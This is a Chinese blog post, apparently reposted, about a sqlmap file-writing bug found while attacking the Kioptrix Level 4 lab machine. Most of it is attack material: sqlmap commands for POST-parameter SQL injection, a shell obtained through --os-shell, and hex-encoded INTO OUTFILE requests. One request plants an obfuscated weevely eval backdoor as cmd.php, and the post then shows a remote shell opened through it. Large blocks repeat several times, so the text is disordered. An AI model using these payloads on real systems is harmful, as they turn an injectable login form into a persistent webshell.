新发现的sqlmap关于上传文件的一个bug
程序员文章站
2022-06-28 09:34:33
sqlmap是一个python编写的sql注入检测开源软件。支持检测mysql,oracle,sql server,PostgreSQL等数据库的注入攻击。
这是我在无聊玩kioptrix_...
sqlmap是一个python编写的sql注入检测开源软件。支持检测mysql,oracle,sql server,PostgreSQL等数据库的注入攻击。
这是我在无聊玩kioptrix_level_4的过程中发现的sqlmap的一个bug,我的sqlmap版本是sqlmap/1.0-dev (r4766),可能有些老了
sqlmap在上传自定义文件上存在bug,可以利用burpsuite来修正
利用sqlmap获取一个os-shell
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --os-shell -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:09:54
[19:09:54] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:09:54] [INFO] resuming injection data from session file
[19:09:54] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:09:54] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:09:54] [INFO] testing connection to the target url
[19:09:54] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login --- [19:09:54] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5 [19:09:54] [INFO] going to use a web backdoor for command prompt [19:09:54] [INFO] fingerprinting the back-end DBMS operating system [19:09:54] [INFO] the back-end DBMS operating system is Windows [19:09:54] [INFO] trying to upload the file stager which web application language does the web server support? [1] ASP [2] ASPX [3] PHP (default) [4] JSP > 3
[19:09:57] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: /var/www/
[19:10:01] [INFO] retrieved web server full paths: '/var/www/checklogin.php'
please provide any additional web server full path to try to upload the agent [Enter for None]:
[19:10:03] [INFO] the file stager has been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpujyuo.php
[19:10:03] [WARNING] unable to upload the backdoor through the file stager on '\var\www'
[19:10:03] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] y
[19:10:04] [INFO] the backdoor has probably been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpblegd.php
[19:10:04] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --os-shell -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:09:54
[19:09:54] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:09:54] [INFO] resuming injection data from session file
[19:09:54] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:09:54] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:09:54] [INFO] testing connection to the target url
[19:09:54] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login --- [19:09:54] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5 [19:09:54] [INFO] going to use a web backdoor for command prompt [19:09:54] [INFO] fingerprinting the back-end DBMS operating system [19:09:54] [INFO] the back-end DBMS operating system is Windows [19:09:54] [INFO] trying to upload the file stager which web application language does the web server support? [1] ASP [2] ASPX [3] PHP (default) [4] JSP > 3
[19:09:57] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: /var/www/
[19:10:01] [INFO] retrieved web server full paths: '/var/www/checklogin.php'
please provide any additional web server full path to try to upload the agent [Enter for None]:
[19:10:03] [INFO] the file stager has been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpujyuo.php
[19:10:03] [WARNING] unable to upload the backdoor through the file stager on '\var\www'
[19:10:03] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] y
[19:10:04] [INFO] the backdoor has probably been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpblegd.php
[19:10:04] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
利用burp抓取的关键数据包
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1826
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-1172%27%20OR%202447%3D2447%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Ftmpulehi.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d2929207b0a20202020246469723d245f524551554553545b2275706c6f6164446972225d3b0a0a202020206966202870687076657273696f6e2829203c2027342e312e3027290a202020207b0a20202020202020202466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a20202020656c73650a202020207b0a20202020202020202466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a202020204063686d6f642824646972202e20222f22202e202466696c652c2030373535293b0a202020206563686f202246696c652075706c6f61646564223b0a7d0a656c7365207b0a202020206563686f20223c666f726d20616374696f6e3d22202e20245f5345525645525b225048505f53454c46225d202e2022206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5c5c7661725c5c7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b0a7d0a3f3e0a%20--%20AND%20%27yJWo%27%3D%27yJWo&Submit=Login
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1826
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-1172%27%20OR%202447%3D2447%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Ftmpulehi.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d2929207b0a20202020246469723d245f524551554553545b2275706c6f6164446972225d3b0a0a202020206966202870687076657273696f6e2829203c2027342e312e3027290a202020207b0a20202020202020202466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a20202020656c73650a202020207b0a20202020202020202466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a202020204063686d6f642824646972202e20222f22202e202466696c652c2030373535293b0a202020206563686f202246696c652075706c6f61646564223b0a7d0a656c7365207b0a202020206563686f20223c666f726d20616374696f6e3d22202e20245f5345525645525b225048505f53454c46225d202e2022206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5c5c7661725c5c7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b0a7d0a3f3e0a%20--%20AND%20%27yJWo%27%3D%27yJWo&Submit=Login
可见sqlmap是利用select into outfile的方法来写文件
查看下当前目录的文件权限
os-shell> ls -la
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
total 68
drwxr-xr-x 5 root root 4096 Jun 27 15:10 .
drwxr-xr-x 14 root root 4096 Feb 4 09:57 ..
-rw-r--r-- 1 root root 1477 Feb 6 11:31 checklogin.php
-rw-r--r-- 1 root root 298 Feb 4 11:11 database.sql
drwxr-xr-x 2 root root 4096 Feb 6 11:44 images
-rw-r--r-- 1 root root 1255 Feb 6 12:07 index.php
drwxr-xr-x 2 root root 4096 Feb 4 18:33 john
-rw-r--r-- 1 root root 176 Feb 4 12:39 login_success.php
-rw-r--r-- 1 root root 78 Feb 4 11:33 logout.php
-rw-r--r-- 1 root root 606 Feb 6 15:42 member.php
drwxr-xr-x 2 root root 4096 Feb 4 18:30 robert
-rw-rw-rw- 1 root root 927 Jun 27 15:10 tmpblegd.php
-rw-rw-rw- 1 root root 927 Jun 27 15:09 tmpbxngb.php
-rw-rw-rw- 1 root root 927 Jun 27 15:04 tmpbypfb.php
-rw-rw-rw- 1 root root 833 Jun 27 15:09 tmpubbwi.php
-rw-rw-rw- 1 root root 833 Jun 27 15:10 tmpujyuo.php
-rw-rw-rw- 1 root root 833 Jun 27 15:03 tmputbuj.php
---
os-shell> ls -la
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
total 68
drwxr-xr-x 5 root root 4096 Jun 27 15:10 .
drwxr-xr-x 14 root root 4096 Feb 4 09:57 ..
-rw-r--r-- 1 root root 1477 Feb 6 11:31 checklogin.php
-rw-r--r-- 1 root root 298 Feb 4 11:11 database.sql
drwxr-xr-x 2 root root 4096 Feb 6 11:44 images
-rw-r--r-- 1 root root 1255 Feb 6 12:07 index.php
drwxr-xr-x 2 root root 4096 Feb 4 18:33 john
-rw-r--r-- 1 root root 176 Feb 4 12:39 login_success.php
-rw-r--r-- 1 root root 78 Feb 4 11:33 logout.php
-rw-r--r-- 1 root root 606 Feb 6 15:42 member.php
drwxr-xr-x 2 root root 4096 Feb 4 18:30 robert
-rw-rw-rw- 1 root root 927 Jun 27 15:10 tmpblegd.php
-rw-rw-rw- 1 root root 927 Jun 27 15:09 tmpbxngb.php
-rw-rw-rw- 1 root root 927 Jun 27 15:04 tmpbypfb.php
-rw-rw-rw- 1 root root 833 Jun 27 15:09 tmpubbwi.php
-rw-rw-rw- 1 root root 833 Jun 27 15:10 tmpujyuo.php
-rw-rw-rw- 1 root root 833 Jun 27 15:03 tmputbuj.php
---
根据上面的文件权限,我们是无法利用sqlmap生成的os-shell文件tmpblegd.php进一步上传自定义文件的,mysql,apache分组权限问题?
下面我们尝试使用sqlmap的–file参数上传任意文件
我比较喜欢的php后门是weevely,类似菜刀,利用weevely生成一个后门
left@Dis9team:~$ sudo weevely generate toor ~/shell.php
[sudo] password for left:
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
+ Backdoor file '/home/left/shell.php' created with password 'toor'.
left@Dis9team:~$ sudo weevely generate toor ~/shell.php
[sudo] password for left:
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
+ Backdoor file '/home/left/shell.php' created with password 'toor'.
使用sqlmap的–file参数上传任意文件
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:18:34
[19:18:34] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:18:34] [INFO] resuming injection data from session file
[19:18:34] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:18:34] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:18:34] [INFO] testing connection to the target url
[19:18:35] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login
---
[19:18:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:18:35] [INFO] fingerprinting the back-end DBMS operating system
[19:18:35] [INFO] the back-end DBMS operating system is Windows
[19:18:35] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:18:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org www.2cto.com
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:18:34
[19:18:34] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:18:34] [INFO] resuming injection data from session file
[19:18:34] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:18:34] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:18:34] [INFO] testing connection to the target url
[19:18:35] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login
---
[19:18:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:18:35] [INFO] fingerprinting the back-end DBMS operating system
[19:18:35] [INFO] the back-end DBMS operating system is Windows
[19:18:35] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:18:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
[*] shutting down at 19:18:35
根据返回的代码,可心看出sqlmapy认定指纹识别数据库服务器为windows(实际为ubuntu)而无法写文件,我们强制加个–os=”Linux”来写试试,
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php --os="Linux" -v 0
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php --os="Linux" -v 0
看看sqlmap返回的代码
[19:21:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:21:15] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:21:15] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
[19:21:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:21:15] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:21:15] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
提示sql注入方法无法写入认定的Linux系统中
下面我们利用burpsuite,修改数据来上传任意代码
利用burpsuite的repeater功能拦截–os-shell数据包,修改上传,我修改后的数据包为
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1337
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-7451%27%20OR%206811%3D6811%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fcmd.php%27%20LINES%20TERMINATED%20BY%200x3c3f706870202024706973343d226e4b76617963704c43427162326c754b474679636d4676613558334e7361574e6c4b4352684c43526a76614b43526876614b537661307a4b7661536b704b536b375a574e6f6279416e50766143386e76614c6952724c69632b4a7a7439223b2024706973323d22506a4d7065326c76617561766156397a5a58516f4a325679636d3979583278765a796373494363765a4756324c3235316247776e4b547661736b7661617a306e76616233496e4f32566a614738674a76617a776e4c766169527276614c69632b4a7a746c646d76614673223b20246b6d203d20227374725f7265706c616365223b2024626a203d2022626b616b736b656b366b346b5f6465636f6b646b65223b2024706973333d224b474a68633255324e46396b5a574e765a47556f63484a6c5a76613139795a58427359574e76616c4b474679636d463576614b766143637657313563647a3163633130764a79776e4c31787a4c7963704c4342766168636e4a686553676e76614a7977223b2024706973313d224a474d394a3276614e766457766135304a76617a7661736b5954306b583076614e7661505430744a525474705a69687976615a584e6c647661436776616b59536b395053647661306279766163674a697661597661674a7661474d6f4a474570223b2024626a203d20246b6d28226b222c2022222c2024626a293b206576616c2824626a28246b6d28227661222c2022222c2024706973312e24706973322e24706973332e24706973342929293b20203f3e%20--%20AND%20%27Exci%27%3D%27Exci&Submit=Login
定义上传位置为/var/www/cmd.php,cmd文件内容为上文weevely生成的后门,下面我们连接试试
left@Dis9team:~$ weevely http://192.168.84.132/cmd.php toor
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
[+] Starting terminal. Shell probe may take a while...
[+] List modules with and show help with :show [module name]
www-data@Kioptrix4:/var/www$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1337
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-7451%27%20OR%206811%3D6811%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fcmd.php%27%20LINES%20TERMINATED%20BY%200x3c3f706870202024706973343d226e4b76617963704c43427162326c754b474679636d4676613558334e7361574e6c4b4352684c43526a76614b43526876614b537661307a4b7661536b704b536b375a574e6f6279416e50766143386e76614c6952724c69632b4a7a7439223b2024706973323d22506a4d7065326c76617561766156397a5a58516f4a325679636d3979583278765a796373494363765a4756324c3235316247776e4b547661736b7661617a306e76616233496e4f32566a614738674a76617a776e4c766169527276614c69632b4a7a746c646d76614673223b20246b6d203d20227374725f7265706c616365223b2024626a203d2022626b616b736b656b366b346b5f6465636f6b646b65223b2024706973333d224b474a68633255324e46396b5a574e765a47556f63484a6c5a76613139795a58427359574e76616c4b474679636d463576614b766143637657313563647a3163633130764a79776e4c31787a4c7963704c4342766168636e4a686553676e76614a7977223b2024706973313d224a474d394a3276614e766457766135304a76617a7661736b5954306b583076614e7661505430744a525474705a69687976615a584e6c647661436776616b59536b395053647661306279766163674a697661597661674a7661474d6f4a474570223b2024626a203d20246b6d28226b222c2022222c2024626a293b206576616c2824626a28246b6d28227661222c2022222c2024706973312e24706973322e24706973332e24706973342929293b20203f3e%20--%20AND%20%27Exci%27%3D%27Exci&Submit=Login
定义上传位置为/var/www/cmd.php,cmd文件内容为上文weevely生成的后门,下面我们连接试试
left@Dis9team:~$ weevely http://192.168.84.132/cmd.php toor
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
[+] Starting terminal. Shell probe may take a while...
[+] List modules with and show help with :show [module name]
www-data@Kioptrix4:/var/www$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
作者:left@Dis9team http://www.dis9.com/newly-discovered-sqlmap-upload-files-a-bug-2.html
这是我在无聊玩kioptrix_level_4的过程中发现的sqlmap的一个bug,我的sqlmap版本是sqlmap/1.0-dev (r4766),可能有些老了
sqlmap在上传自定义文件上存在bug,可以利用burpsuite来修正
利用sqlmap获取一个os-shell
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --os-shell -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:09:54
[19:09:54] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:09:54] [INFO] resuming injection data from session file
[19:09:54] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:09:54] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:09:54] [INFO] testing connection to the target url
[19:09:54] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login --- [19:09:54] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5 [19:09:54] [INFO] going to use a web backdoor for command prompt [19:09:54] [INFO] fingerprinting the back-end DBMS operating system [19:09:54] [INFO] the back-end DBMS operating system is Windows [19:09:54] [INFO] trying to upload the file stager which web application language does the web server support? [1] ASP [2] ASPX [3] PHP (default) [4] JSP > 3
[19:09:57] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: /var/www/
[19:10:01] [INFO] retrieved web server full paths: '/var/www/checklogin.php'
please provide any additional web server full path to try to upload the agent [Enter for None]:
[19:10:03] [INFO] the file stager has been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpujyuo.php
[19:10:03] [WARNING] unable to upload the backdoor through the file stager on '\var\www'
[19:10:03] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] y
[19:10:04] [INFO] the backdoor has probably been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpblegd.php
[19:10:04] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --os-shell -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:09:54
[19:09:54] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:09:54] [INFO] resuming injection data from session file
[19:09:54] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:09:54] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:09:54] [INFO] testing connection to the target url
[19:09:54] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login --- [19:09:54] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5 [19:09:54] [INFO] going to use a web backdoor for command prompt [19:09:54] [INFO] fingerprinting the back-end DBMS operating system [19:09:54] [INFO] the back-end DBMS operating system is Windows [19:09:54] [INFO] trying to upload the file stager which web application language does the web server support? [1] ASP [2] ASPX [3] PHP (default) [4] JSP > 3
[19:09:57] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: /var/www/
[19:10:01] [INFO] retrieved web server full paths: '/var/www/checklogin.php'
please provide any additional web server full path to try to upload the agent [Enter for None]:
[19:10:03] [INFO] the file stager has been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpujyuo.php
[19:10:03] [WARNING] unable to upload the backdoor through the file stager on '\var\www'
[19:10:03] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] y
[19:10:04] [INFO] the backdoor has probably been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpblegd.php
[19:10:04] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
利用burp抓取的关键数据包
